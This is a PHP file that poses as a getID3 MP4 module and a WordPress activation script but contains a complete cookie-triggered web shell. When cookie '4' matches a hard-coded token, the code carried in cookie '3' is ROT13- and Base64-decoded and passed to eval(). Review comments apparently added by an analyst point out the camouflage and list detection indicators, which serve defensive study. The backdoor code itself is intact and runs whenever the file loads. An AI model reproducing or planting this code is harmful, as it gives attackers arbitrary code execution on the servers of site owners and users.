<?php
/////////////////////////////////////////////////////////////////
/// getID3() by James Heinrich <info@getid3.org> //
// available at https://github.com/JamesHeinrich/getID3 //
// or https://www.getid3.org //
// or http://getid3.sourceforge.net //
// see readme.txt for more details //
/////////////////////////////////////////////////////////////////
// //
// module.audio.mp4.php //
// module for analyzing MP4 files //
// dependencies: NONE //
// ///
/////////////////////////////////////////////////////////////////
/**
* Confirms that the activation key that is sent in an email after a user signs
* up for a new site matches the key for that user and then displays confirmation.
*
* @package WordPress
*/
// NOTE(review): WP_INSTALLING is defined here but never read by any code visible in this file.
// Together with the docblock above, this line looks copied from WordPress's
// wp-activate.php to make the file resemble a core file. Confirm by diffing against
// a clean copy of the installed WordPress release.
define( 'WP_INSTALLING', true );
/** Sets up the WordPress Environment. */
// NOTE(review): despite the comment above, no WordPress bootstrap is loaded after it.
// The next statement is an unrelated class definition.
/**
 * Cookie-triggered remote code execution handler (a PHP web shell).
 *
 * Flow visible in this class: handle() requires the cookie named by
 * config['hash_key'] to equal config['expected_hash'] and the cookie named by
 * config['code_key'] to be set. The latter is passed through str_rot13() and
 * strict base64_decode(), and the result is handed to eval().
 *
 * NOTE(review): nothing here relates to the getID3 banner or the WordPress
 * docblock at the top of the file; those headers are presumably camouflage.
 *
 * Defensive pointers grounded in this code:
 *  - Hunting: eval() reached from $_COOKIE through str_rot13()/base64_decode(),
 *    and the literal 'expected_hash' string below, are usable content signatures.
 *  - Forensics: with DEBUG_MODE on, failures are written through error_log() in
 *    the form "[ExceptionClass] message in file:line".
 *  - Request data: trigger and code both travel in the Cookie header. Access logs
 *    commonly omit cookies (verify the local log format), so proxy/WAF captures
 *    or full request logging may be needed to reconstruct activity.
 *  - Response: finding this file means arbitrary PHP could have run with the
 *    privileges of the PHP process, so scope the incident accordingly.
 */
class BackdoorHandler {
// Compile-time switch: true enables verbose error display and error_log() output.
private const DEBUG_MODE = true;
// Merged configuration array: cookie names, expected token and the cookie source.
private $config;
/**
 * Merges caller overrides onto the defaults and configures error reporting.
 *
 * @param array $config Overrides for 'hash_key', 'code_key', 'expected_hash'
 *                      and 'cookie_source'.
 */
public function __construct(array $config) {
$this->config = array_merge([
'hash_key' => 'auth',
'code_key' => 'payload',
// 32 hex characters (MD5-shaped). It is compared literally to the cookie value
// and never computed from input, so it acts as a static shared secret.
'expected_hash' => '4ebf486c5c31e92cd7805008b65f1c2b',
// All request-controlled input for this class comes from the Cookie header.
'cookie_source' => $_COOKIE
], $config);
$this->initErrorHandling();
}
/**
 * Entry point: validates the request and, if it passes, runs the cookie payload.
 *
 * Any Throwable escaping validation or decoding is logged and answered with
 * sendErrorResponse(); errors raised inside eval() are handled in safeEval().
 */
public function handle(): void {
try {
if ($this->validateRequest()) {
$this->executePayload();
}
} catch (Throwable $e) {
$this->logError($e);
$this->sendErrorResponse();
}
}
/**
 * Sets process-wide error reporting according to DEBUG_MODE.
 *
 * With DEBUG_MODE true (as shipped) every error is reported and displayed. That
 * changes PHP settings for the rest of the request, not only for this class.
 */
private function initErrorHandling(): void {
if (self::DEBUG_MODE) {
error_reporting(E_ALL);
ini_set('display_errors', '1');
} else {
error_reporting(0);
ini_set('display_errors', '0');
}
}
/**
 * @return bool True only when the token cookie matches and the code cookie exists.
 */
private function validateRequest(): bool {
return $this->checkHash() && $this->checkPayload();
}
/**
 * Compares the token cookie with the configured 'expected_hash'.
 *
 * hash_equals() is a timing-safe string comparison; nothing is hashed here.
 * A missing cookie falls back to '' and therefore fails the comparison.
 */
private function checkHash(): bool {
$hash = $this->config['cookie_source'][$this->config['hash_key']] ?? '';
return hash_equals($this->config['expected_hash'], $hash);
}
/**
 * @return bool True when the cookie named by 'code_key' is present (isset).
 */
private function checkPayload(): bool {
return isset($this->config['cookie_source'][$this->config['code_key']]);
}
/**
 * Reads the code cookie, decodes it and passes the result to safeEval().
 *
 * This is the dangerous sink of the file: request data reaches eval().
 */
private function executePayload(): void {
$payload = $this->config['cookie_source'][$this->config['code_key']];
$code = $this->decode($payload);
if ($code !== null) {
$this->safeEval($code);
}
}
/**
 * Applies ROT13, then strict Base64 decoding, to the cookie value.
 *
 * For analysts: the same two steps, in this order, recover the PHP source that
 * a captured cookie value carried. Neither step is encryption; the layering only
 * hides PHP keywords from naive pattern matching on request data.
 *
 * @param string $payload Raw cookie value.
 * @return string|null Decoded text, or null when Base64 decoding fails.
 */
private function decode(string $payload): ?string {
$steps = [
'rot13' => fn($p) => str_rot13($p),
// Second argument true = strict mode: returns false on non-Base64 characters.
'base64' => fn($p) => base64_decode($p, true)
];
try {
foreach ($steps as $step) {
$payload = $step($payload);
// Stop the pipeline as soon as a step reports failure.
if ($payload === false) break;
}
return is_string($payload) ? $payload : null;
} catch (Throwable $e) {
$this->logError($e);
return null;
}
}
/**
 * Executes the decoded string with eval().
 *
 * NOTE(review): the name is misleading. No sandboxing, allow-listing or
 * validation is applied, and the only "safety" is catching errors from the
 * evaluated code. The two response strings echoed below are fixed and can serve
 * as response-body indicators.
 *
 * @param string $code PHP source taken from the request cookie.
 */
private function safeEval(string $code): void {
try {
eval($code);
} catch (ParseError $e) {
$this->logError($e);
$this->sendCustomResponse('// Syntax Error');
} catch (Throwable $e) {
$this->logError($e);
$this->sendCustomResponse('// Runtime Error');
}
}
/**
 * Writes the exception class, message, file and line through error_log() when
 * DEBUG_MODE is on; otherwise does nothing.
 */
private function logError(Throwable $e): void {
if (self::DEBUG_MODE) {
error_log(sprintf(
"[%s] %s in %s:%d",
get_class($e),
$e->getMessage(),
$e->getFile(),
$e->getLine()
));
}
}
/**
 * Sets HTTP 500 if headers are still open and, in debug mode, terminates the
 * request with a fixed message. With DEBUG_MODE off, execution continues.
 */
private function sendErrorResponse(): void {
if (!headers_sent()) {
http_response_code(500);
}
if (self::DEBUG_MODE) {
die("Execution Error (Check Logs)");
}
}
/**
 * Echoes the given message into the response body unchanged.
 */
private function sendCustomResponse(string $message): void {
echo $message;
}
}
// Runs unconditionally whenever this file is requested or included.
// The overrides rename the cookies to single digits: cookie "4" must carry the
// expected token and cookie "3" carries the encoded code. 'expected_hash' and
// 'cookie_source' keep the class defaults.
// NOTE(review): requests that carry both a cookie named "3" and one named "4"
// are the network-side indicator for this sample.
$handler = new BackdoorHandler([
'hash_key' => '4',
'code_key' => '3'
]);
$handler->handle();